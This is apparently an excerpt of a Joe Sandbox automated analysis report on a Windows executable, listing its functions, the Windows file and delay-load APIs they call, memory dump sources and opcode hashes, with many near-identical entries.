                                                                                                                    • Opcode Fuzzy Hash: d0a2e640a60749eb3eeedc02d2a13af825b1a789c83d6c628bbad6c31c46d4ec
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 1630e342936df6220d1112c09e3589097b895b2961d0687e9efed75baa15bc2b
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 1630e342936df6220d1112c09e3589097b895b2961d0687e9efed75baa15bc2b
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: bd7355a510e09fad1f8772c23d4050751db93eb6a134e88ce84e590b0be0282e
                                                                                                                    • Instruction ID: 7148deaaadde51f3fa1de7d0ed50541b0579db28bf33bb3d697e160c751629c4
                                                                                                                    • Opcode Fuzzy Hash: bd7355a510e09fad1f8772c23d4050751db93eb6a134e88ce84e590b0be0282e
                                                                                                                    • Instruction Fuzzy Hash: FBA011E22A8002BC3808A2882E0BCBF0E0CE0C2F20330882EF80280080BC802C020830
                                                                                                                    Function 0059E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: c595f22b638b340e33f66d8e38f63f105debe2b92acf0cd8b85ec48a2a77655e
                                                                                                                    • Instruction ID: 7148deaaadde51f3fa1de7d0ed50541b0579db28bf33bb3d697e160c751629c4
                                                                                                                    • Opcode Fuzzy Hash: c595f22b638b340e33f66d8e38f63f105debe2b92acf0cd8b85ec48a2a77655e
                                                                                                                    • Instruction Fuzzy Hash: FBA011E22A8002BC3808A2882E0BCBF0E0CE0C2F20330882EF80280080BC802C020830
                                                                                                                    Function 0059E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: f746618aa6c22f2d2e24933d34962477acf8da597815f1edccd82cd4b835e72a
                                                                                                                    • Instruction ID: 7148deaaadde51f3fa1de7d0ed50541b0579db28bf33bb3d697e160c751629c4
                                                                                                                    • Opcode Fuzzy Hash: f746618aa6c22f2d2e24933d34962477acf8da597815f1edccd82cd4b835e72a
                                                                                                                    • Instruction Fuzzy Hash: FBA011E22A8002BC3808A2882E0BCBF0E0CE0C2F20330882EF80280080BC802C020830
                                                                                                                    Function 0059E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: b617694fd7cd75f11cec9017db71ddafc482f61d637da314e90905827d41d135
                                                                                                                    • Instruction ID: d48ac6ffab10e04a1b0410c61c632ea60bd066958cc019da37201cdbb59cd234
                                                                                                                    • Opcode Fuzzy Hash: b617694fd7cd75f11cec9017db71ddafc482f61d637da314e90905827d41d135
                                                                                                                    • Instruction Fuzzy Hash: 3AA011E22A80023C3808E2A02C0BC3B0E0CE0C0B223328A2EF800800C0BC8028020830
                                                                                                                    Function 0059E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: 1ea0a7625781dcffc400369102c54f3f06e709f6fcb57e5e3044262866a610a9
                                                                                                                    • Instruction ID: 7148deaaadde51f3fa1de7d0ed50541b0579db28bf33bb3d697e160c751629c4
                                                                                                                    • Opcode Fuzzy Hash: 1ea0a7625781dcffc400369102c54f3f06e709f6fcb57e5e3044262866a610a9
                                                                                                                    • Instruction Fuzzy Hash: FBA011E22A8002BC3808A2882E0BCBF0E0CE0C2F20330882EF80280080BC802C020830
                                                                                                                    Function 0059E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: d13b74bd8d6b4d3bf9895aef9dd52cc7db26f9178d7f112156fe897eab731316
                                                                                                                    • Instruction ID: 67d5f2b1e82ca124fdbd42fa22b54c1ea1157126b302d4807e8bb6dd65800860
                                                                                                                    • Opcode Fuzzy Hash: d13b74bd8d6b4d3bf9895aef9dd52cc7db26f9178d7f112156fe897eab731316
                                                                                                                    • Instruction Fuzzy Hash: C8A011E22A8002BC3808E2A02C0BC3B0E0CE0C0B20332882EF802800C0BC8028020830
                                                                                                                    Function 0059E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: cc54e381d863c80468b937b351faf3c5dc4108c5f21b3d27e42571182a86ca5a
                                                                                                                    • Instruction ID: 67d5f2b1e82ca124fdbd42fa22b54c1ea1157126b302d4807e8bb6dd65800860
                                                                                                                    • Opcode Fuzzy Hash: cc54e381d863c80468b937b351faf3c5dc4108c5f21b3d27e42571182a86ca5a
                                                                                                                    • Instruction Fuzzy Hash: C8A011E22A8002BC3808E2A02C0BC3B0E0CE0C0B20332882EF802800C0BC8028020830
                                                                                                                    Function 005ABBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005AB7BB: GetOEMCP.KERNEL32(00000000,?,?,005ABA44,?), ref: 005AB7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,005ABA89,?,00000000), ref: 005ABC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,005ABA89,?,?,?,005ABA89,?,00000000), ref: 005ABC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 315e5cedf2a5357defa3f6d80b949ccbec7138f5ca9acaf1d4a87d9519ee57ca
                                                                                                                    • Instruction ID: d4e403970e6b8161a831bed1d025fb4467442f97b6b27eb0b09521f3409a0ff6
                                                                                                                    • Opcode Fuzzy Hash: 315e5cedf2a5357defa3f6d80b949ccbec7138f5ca9acaf1d4a87d9519ee57ca
                                                                                                                    • Instruction Fuzzy Hash: 0F5100709002469EEB209F75C896BBEBFE5FF43310F18446ED4968B253DB39A9458BD0
                                                                                                                    Function 00589A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00589A50,?,?,00000000,?,?,00588CBC,?), ref: 00589BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00588411,-00009570,00000000,000007F3), ref: 00589BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: cffbfe392601d60103f15eac406e31eae565b402fd5cd1f71f7d8797171975aa
                                                                                                                    • Instruction ID: 072fca704f5d5cb95acd143fbb38d58c0e4573f7412ece98551689e68afc0761
                                                                                                                    • Opcode Fuzzy Hash: cffbfe392601d60103f15eac406e31eae565b402fd5cd1f71f7d8797171975aa
                                                                                                                    • Instruction Fuzzy Hash: A841AB306083428BDB24AF15E58447ABBE5FBD4322F188A2DEC81A3261E770AD448B91
                                                                                                                    Function 00581E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00581E55
                                                                                                                      • Part of subcall function 00583BBA: __EH_prolog.LIBCMT ref: 00583BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00581EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    • Opcode ID: 2bbb85995aac0bfcef9a20ffabc37805df503b728d53855cfb245e3d0b63a1db
                                                                                                                    • Instruction ID: 3ed5cd4814c8cb7752dd891b7ba96e70ba26bdeb729dec1d333ce0f3062fb2c3
                                                                                                                    • Opcode Fuzzy Hash: 2bbb85995aac0bfcef9a20ffabc37805df503b728d53855cfb245e3d0b63a1db
                                                                                                                    • Instruction Fuzzy Hash: 6631187190460AAACF15EF98C949AEEBFFABF58300F1004A9F845B7251CB365E11CB64
                                                                                                                    Function 00589DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005873BC,?,?,?,00000000), ref: 00589DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00589E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    • Opcode ID: 10d035a9e42cca8ad2aad4bc6c6f912a9e7740040114d7b13e4894aa71eeeadf
                                                                                                                    • Instruction ID: d9d1d20808b2a8f6c050c3eff9ba3278cc14e0670a5c34cb54907c4781f26eee
                                                                                                                    • Opcode Fuzzy Hash: 10d035a9e42cca8ad2aad4bc6c6f912a9e7740040114d7b13e4894aa71eeeadf
                                                                                                                    • Instruction Fuzzy Hash: 9021F031249246EBC714EF34C895ABBBFE8BF91304F08491CF8C597141D329E90D9BA1
                                                                                                                    Function 0058966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00589F27,?,?,0058771A), ref: 005896E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00589F27,?,?,0058771A), ref: 00589716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: e0f3f82cdeba4b6abf5522497504648f29cc8aebf95d566c3929f35cc6065dc4
                                                                                                                    • Instruction ID: 20e5496855f1d0ab00ced4ee5d9f5c5aa6f89b493063810dd1d218dd34e8dd4d
                                                                                                                    • Opcode Fuzzy Hash: e0f3f82cdeba4b6abf5522497504648f29cc8aebf95d566c3929f35cc6065dc4
                                                                                                                    • Instruction Fuzzy Hash: 5321DE710003446EE330AA66CC89BB77BDCFB89320F040A18FDD6D61C1D774A8848731
                                                                                                                    Function 00589E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00589EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00589ED4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
